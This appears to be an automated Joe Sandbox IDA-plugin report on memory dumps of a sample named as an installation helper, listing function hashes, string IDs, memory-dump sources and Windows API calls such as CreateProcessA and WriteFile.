                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                            • String ID: 8Q
                                            • API String ID: 4237864984-4022487301
                                            • Opcode ID: 38eb51bb185ddafb977041b0258725087a37bb1702ad371b4722c0de0f47787c
                                            • Instruction ID: f28bae1c159816105baec86b09eaaab8fcb8e968de728acf1dd63aa7d96ac896
                                            • Opcode Fuzzy Hash: 38eb51bb185ddafb977041b0258725087a37bb1702ad371b4722c0de0f47787c
                                            • Instruction Fuzzy Hash: 57A14732A041449FCF098FA8C955BAE7BB1EB07328F145269E911EB791CB368817EB51

                                             Control-flow Graph
                                             • Interactive graph not recoverable from the text extraction: function starting at 6c75c1e0; Win32 calls shown on the graph: WriteFile, ReadFile
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2247035989.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                             • Associated: 00000006.00000002.2247009003.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2248424081.000000006C7A8000.00000002.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2249898765.000000006C972000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: :uW$;uW$;uW$> 4!$> 4!
                                            • API String ID: 0-4100612575
                                            • Opcode ID: 73a2acd2d5ec405ffff8bd2330b637d2fa5dd746acc6e4f3422ee646c2368426
                                            • Instruction ID: 955e2d8f93f047fb6f4797f37019af65ce4bca1acdad2a0041cf9209a274e1ff
                                            • Opcode Fuzzy Hash: 73a2acd2d5ec405ffff8bd2330b637d2fa5dd746acc6e4f3422ee646c2368426
                                            • Instruction Fuzzy Hash: 7E71ACB0209344AFD710DF58C980B5ABBF4BF8A709F50892EF598D6650DB71D898CB92
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2247035989.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                             • Associated: 00000006.00000002.2247009003.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2248424081.000000006C7A8000.00000002.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2249898765.000000006C972000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: K?Jo$K?Jo$`Rlx$7eO
                                            • API String ID: 0-174837320
                                            • Opcode ID: bd6f02659e42e94aad26ee0e34327332785c0f9889e7ce1be15c739c5baaff67
                                            • Instruction ID: 6a59ed5143472ce03dee0a427f0001a935fe532fa5a60f2498321e24548eba7a
                                            • Opcode Fuzzy Hash: bd6f02659e42e94aad26ee0e34327332785c0f9889e7ce1be15c739c5baaff67
                                            • Instruction Fuzzy Hash: 4E4267B4609341CFD754CF28C590A2ABBE1AFC9314FA48D2EE59587B20DB34E865CB53
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2247035989.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                             • Associated: 00000006.00000002.2247009003.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2248424081.000000006C7A8000.00000002.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2249898765.000000006C972000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ;T55
                                            • API String ID: 0-2572755013
                                            • Opcode ID: db3e14080294ae66a545100dada03f87014401bc47d971babacddc6d402eea3b
                                            • Instruction ID: ba77142c101bc7110a1f00d03795a845ec9dc7d93faa40a18f9065a7aa8df7d1
                                            • Opcode Fuzzy Hash: db3e14080294ae66a545100dada03f87014401bc47d971babacddc6d402eea3b
                                            • Instruction Fuzzy Hash: 6903F431649B018FC728CF2CC8D06A6B7E3AFD53257198B2DC0A64BE95DB74B44ACB45

                                             Control-flow Graph
                                             • Interactive graph not recoverable from the text extraction: function starting at 6c784ff0; Win32 calls shown on the graph: CreateProcessA, WaitForSingleObject, CloseHandle (twice)
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2247035989.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                             • Associated: 00000006.00000002.2247009003.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2248424081.000000006C7A8000.00000002.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2249898765.000000006C972000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID: D
                                            • API String ID: 963392458-2746444292
                                            • Opcode ID: 501e9244c889d75f71949f8b5be16db45f485b76cbed6b4c5d1a9f6a00beea3c
                                            • Instruction ID: 0b5a48d2eed445b9d8c9773c06434330cc8dad7a66dda2d6b10cfa3f072d3257
                                            • Opcode Fuzzy Hash: 501e9244c889d75f71949f8b5be16db45f485b76cbed6b4c5d1a9f6a00beea3c
                                            • Instruction Fuzzy Hash: 3831E27180A3408FE750DF28D19872EBBF0EBDA318F505A2DF59A96250E7759588CF83

                                             Control-flow Graph
                                             • Interactive graph not recoverable from the text extraction: function starting at 6c79bc5e; Win32 calls shown on the graph: WriteFile, GetLastError
                                            APIs
                                              • Part of subcall function 6C79BEB1: GetConsoleCP.KERNEL32(?,6C79B0D0,?), ref: 6C79BEF9
                                            • WriteFile.KERNEL32(?,?,6C7A46EC,00000000,00000000,?,00000000,00000000,6C7A5AB6,00000000,00000000,?,00000000,6C79B0D0,6C7A46EC,00000000), ref: 6C79BDAF
                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,6C7A46EC,6C79B0D0,00000000,?,?,?,?,00000000,?), ref: 6C79BDB9
                                            • __dosmaperr.LIBCMT ref: 6C79BDFE
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2247035989.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                             • Associated: 00000006.00000002.2247009003.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2248424081.000000006C7A8000.00000002.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2249898765.000000006C972000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID: ConsoleErrorFileLastWrite__dosmaperr
                                            • String ID: 8Q
                                            • API String ID: 251514795-4022487301
                                            • Opcode ID: c4caef6a872f861dbe897cad164d8f67c18164fb7fded0925e2095e2ca3bdfc5
                                            • Instruction ID: 7bcaf298c15455fbace6753fdc2e93def3aa8f867eb9baa7e9309e74d65a7639
                                            • Opcode Fuzzy Hash: c4caef6a872f861dbe897cad164d8f67c18164fb7fded0925e2095e2ca3bdfc5
                                            • Instruction Fuzzy Hash: B3511971A0120AAFDF20DFA8DA49FEEBB79EF0631CF140465D500A7A51D730A905C7A1

                                             Control-flow Graph
                                             • Interactive graph not recoverable from the text extraction: function starting at 6c785b90; only internal subroutine calls appear on the graph
                                            APIs
                                            • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C785D31
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2247035989.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                             • Associated: 00000006.00000002.2247009003.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2248424081.000000006C7A8000.00000002.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2249898765.000000006C972000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID: Ios_base_dtorstd::ios_base::_
                                            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                            • API String ID: 323602529-1866435925
                                            • Opcode ID: ca5dd747e28b65386fac304b35d38ad733db4612a7fd4930d28ab372dbfeb806
                                            • Instruction ID: c8c9f697b6a60d86cdd03a2a99bed3ffe61296ec7e393baf1c967ca2ca148c89
                                            • Opcode Fuzzy Hash: ca5dd747e28b65386fac304b35d38ad733db4612a7fd4930d28ab372dbfeb806
                                            • Instruction Fuzzy Hash: EA5154B5501B008FD725CF29CA85B97BBF1FB89308F108A2DD9864BB90D775A909CF90

                                             Control-flow Graph
                                             • Interactive graph not recoverable from the text extraction: function starting at 6c79b925; Win32 calls shown on the graph: CloseHandle, GetLastError
                                            APIs
                                            • CloseHandle.KERNEL32(00000000,?,00000000,?,6C7A425F), ref: 6C79B97B
                                            • GetLastError.KERNEL32(?,00000000,?,6C7A425F), ref: 6C79B985
                                            • __dosmaperr.LIBCMT ref: 6C79B9B0
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2247035989.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                             • Associated: 00000006.00000002.2247009003.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2248424081.000000006C7A8000.00000002.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2249898765.000000006C972000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID: CloseErrorHandleLast__dosmaperr
                                            • String ID:
                                            • API String ID: 2583163307-0
                                            • Opcode ID: cffcd37b714bce9767fde059cb738982c249a716d20a58a1d87f951e937b2fef
                                            • Instruction ID: 399bde8dfb0354db9da4e593ee93c73695228d9b060d3f394bbb4d2a48ef0cad
                                            • Opcode Fuzzy Hash: cffcd37b714bce9767fde059cb738982c249a716d20a58a1d87f951e937b2fef
                                            • Instruction Fuzzy Hash: C9014233665120DBD720067AB64D75D3F694F8373CF250379E91687BC0DF60E4498290

                                             Control-flow Graph
                                             • Interactive graph not recoverable from the text extraction: function starting at 6c790b9c; only internal subroutine calls appear on the graph
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2247035989.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                             • Associated: 00000006.00000002.2247009003.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2248424081.000000006C7A8000.00000002.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2249898765.000000006C972000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 8Q
                                            • API String ID: 0-4022487301
                                            • Opcode ID: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                                            • Instruction ID: 1de6cca2042661af20d2cb18d53c5beecb5c83240cbb4844752b9a4261905277
                                            • Opcode Fuzzy Hash: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                                            • Instruction Fuzzy Hash: 0EF0F4325116546ADA211A3ABF0CBDB36F89F4B37CF100725E97493ED0DB70D40AC6A1
                                            APIs
                                            • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C785AB4
                                            • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C785AF4
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2247035989.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                             • Associated: 00000006.00000002.2247009003.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2248424081.000000006C7A8000.00000002.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2249898765.000000006C972000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID: Ios_base_dtorstd::ios_base::_
                                            • String ID:
                                            • API String ID: 323602529-0
                                            • Opcode ID: 496b1c5de5bcf1b34537388f6c59c2c1bd0a9705b9e57f43272926c7c30b1ecf
                                            • Instruction ID: 5f6b2094a8b4baf7332a1c3f0919d24316ae419e386dbc54ac601714083e6ef6
                                            • Opcode Fuzzy Hash: 496b1c5de5bcf1b34537388f6c59c2c1bd0a9705b9e57f43272926c7c30b1ecf
                                            • Instruction Fuzzy Hash: E1516871101B00DBE725CF25C988BE2BBE4BB04718F448A2CE5AB4BB91DB34B549CB81
                                            APIs
                                            • GetLastError.KERNEL32(6C7B6DD8,0000000C), ref: 6C78EF52
                                            • ExitThread.KERNEL32 ref: 6C78EF59
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2247035989.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                             • Associated: 00000006.00000002.2247009003.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2248424081.000000006C7A8000.00000002.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2249898765.000000006C972000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID: ErrorExitLastThread
                                            • String ID:
                                            • API String ID: 1611280651-0
                                            • Opcode ID: 371071df8bed4ac0852f536bbabb82450c4caf55bedc0f27e27e83e160b99972
                                            • Instruction ID: 2c40df3022d42c1111a5326a1b513293900edf39d4be4685dae2e2200f4f0dbe
                                            • Opcode Fuzzy Hash: 371071df8bed4ac0852f536bbabb82450c4caf55bedc0f27e27e83e160b99972
                                            • Instruction Fuzzy Hash: BFF0C275A01604AFDF049FB0D60DAAE3B74FF41618F244269E115A7B51CB30AA05DBE1
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2247035989.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                             • Associated: 00000006.00000002.2247009003.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2248424081.000000006C7A8000.00000002.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2249898765.000000006C972000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID: __wsopen_s
                                            • String ID:
                                            • API String ID: 3347428461-0
                                            • Opcode ID: 9b4a4eb16f0f381339f66755ce900001f48c727bef7c8bf31a08f96d7c586c64
                                            • Instruction ID: a5678707ddcda8e0c0b5c92b9a0298d6f72569101082136517178427581edbe4
                                            • Opcode Fuzzy Hash: 9b4a4eb16f0f381339f66755ce900001f48c727bef7c8bf31a08f96d7c586c64
                                            • Instruction Fuzzy Hash: 9E114C71A0420EAFCF05CF59E94599B7BF8EF89318F144069F805AB311D671E911CBA4
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2247035989.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                             • Associated: 00000006.00000002.2247009003.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2248424081.000000006C7A8000.00000002.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2249898765.000000006C972000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID: _free
                                            • String ID:
                                            • API String ID: 269201875-0
                                            • Opcode ID: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                                            • Instruction ID: da8c42c36d6e3668729a5db013d93e5a3587cb5198dae9dff9027dd7cbd9b897
                                            • Opcode Fuzzy Hash: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                                            • Instruction Fuzzy Hash: 78018472C01159BFCF019FE88E049DF7FB5AF08304F104165ED24E2250E7318625EB91
                                            APIs
                                            • CreateFileW.KERNEL32(00000000,00000000,?,6C7A4115,?,?,00000000,?,6C7A4115,00000000,0000000C), ref: 6C7A4474
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2247035989.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                             • Associated: 00000006.00000002.2247009003.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2248424081.000000006C7A8000.00000002.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2249898765.000000006C972000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID:
                                            • API String ID: 823142352-0
                                            • Opcode ID: cf0309bf158ecccbe6fd2b5d91b114335e1f05ae1264af941343d321f50fa29d
                                            • Instruction ID: e4b99211ea564e497bfdb78b65d9c07ba8f5d0e6de54d93953762c0a96da73cb
                                            • Opcode Fuzzy Hash: cf0309bf158ecccbe6fd2b5d91b114335e1f05ae1264af941343d321f50fa29d
                                            • Instruction Fuzzy Hash: F8D06C3214010DBBDF028F84DC06EDA3BAAFB88714F014010BA1856020C732E862AB94
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2247035989.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                             • Associated: 00000006.00000002.2247009003.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2248424081.000000006C7A8000.00000002.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2249898765.000000006C972000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                                            • Instruction ID: 5924303b9869d77e28410173021de2b9ddca8dd23a88515cc73a84d458e8b9e7
                                            • Opcode Fuzzy Hash: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                                            • Instruction Fuzzy Hash:
                                            APIs
                                            • __EH_prolog.LIBCMT ref: 6C8184B1
                                              • Part of subcall function 6C81993B: __EH_prolog.LIBCMT ref: 6C819940
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7B8000, based on PE: true
                                             • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID: H_prolog
                                            • String ID: 1$`)K$h)K
                                            • API String ID: 3519838083-3935664338
                                            • Opcode ID: fb81dbfa73f61bd15ec69b15b7f2714c80bc06e5f8e59c27703e0bd61042d5ed
                                            • Instruction ID: 204335f57e14d855fb6530ca1051c96999f2bc12bc10010358cf21d1ed6f1b0b
                                            • Opcode Fuzzy Hash: fb81dbfa73f61bd15ec69b15b7f2714c80bc06e5f8e59c27703e0bd61042d5ed
                                            • Instruction Fuzzy Hash: A2F27C70D08259DFDB21CFA8CA88BDDBBF5AF49308F244899D449ABB41D7709A85CF11
                                            APIs
                                            • __EH_prolog.LIBCMT ref: 6C80AEF4
                                              • Part of subcall function 6C80E622: __EH_prolog.LIBCMT ref: 6C80E627
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7B8000, based on PE: true
                                             • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID: H_prolog
                                            • String ID: $h%K
                                            • API String ID: 3519838083-1737110039
                                            • Opcode ID: 17cf35b80b03fcff345a605a7a63ea6e65b0b9a8420bc989c8341716572d16e6
                                            • Instruction ID: fda0433fd308b96452cc0dd7c6a185adc6c70484c27e9b1e0311e5366d1a0985
                                            • Opcode Fuzzy Hash: 17cf35b80b03fcff345a605a7a63ea6e65b0b9a8420bc989c8341716572d16e6
                                            • Instruction Fuzzy Hash: DB538B30A01258DFDB25CFA8CE94BEDBBB4AF15308F1448A9D459A7791CB309E89CF51
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7B8000, based on PE: true
                                             • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID: H_prolog
                                            • String ID: $J
                                            • API String ID: 3519838083-1755042146
                                            • Opcode ID: bc8a295356575513f6860aba7bf9c3ae3d8e4be31f89be339654daa28ae8d27d
                                            • Instruction ID: ef3ff7f9128279cf7dec6c5b696a0b212e05b521f6e91b113ed4cdcd3e48a3d2
                                            • Opcode Fuzzy Hash: bc8a295356575513f6860aba7bf9c3ae3d8e4be31f89be339654daa28ae8d27d
                                            • Instruction Fuzzy Hash: A2E2C67090924ADFDF22CFA8C648BDDBBF0AF05308F24489AD855ABB81D774D945CB61
                                            APIs
                                            • __EH_prolog.LIBCMT ref: 6C7E6CE5
                                              • Part of subcall function 6C7BCC2A: __EH_prolog.LIBCMT ref: 6C7BCC2F
                                              • Part of subcall function 6C7BE6A6: __EH_prolog.LIBCMT ref: 6C7BE6AB
                                              • Part of subcall function 6C7E6A0E: __EH_prolog.LIBCMT ref: 6C7E6A13
                                              • Part of subcall function 6C7E6837: __EH_prolog.LIBCMT ref: 6C7E683C
                                              • Part of subcall function 6C7EA143: __EH_prolog.LIBCMT ref: 6C7EA148
                                              • Part of subcall function 6C7EA143: ctype.LIBCPMT ref: 6C7EA16C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7B8000, based on PE: true
                                             • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID: H_prolog$ctype
                                            • String ID:
                                            • API String ID: 1039218491-3916222277
                                            • Opcode ID: 905438d877a3164863332086eaa33768b02ac55e5ee0ef1456ae7a8ba4df0a90
                                            • Instruction ID: 2750e653778a804e968590fb938ece0c6ec21168bdfd32ec0074eec275836c7c
                                            • Opcode Fuzzy Hash: 905438d877a3164863332086eaa33768b02ac55e5ee0ef1456ae7a8ba4df0a90
                                            • Instruction Fuzzy Hash: 0D03CF3280424CDEDF15DFA8CA98BDCBBB0AF29318F1480A9D45577792DB345B89CB61
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7B8000, based on PE: true
                                             • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 3J$`/J$`1J$p0J
                                            • API String ID: 0-2826663437
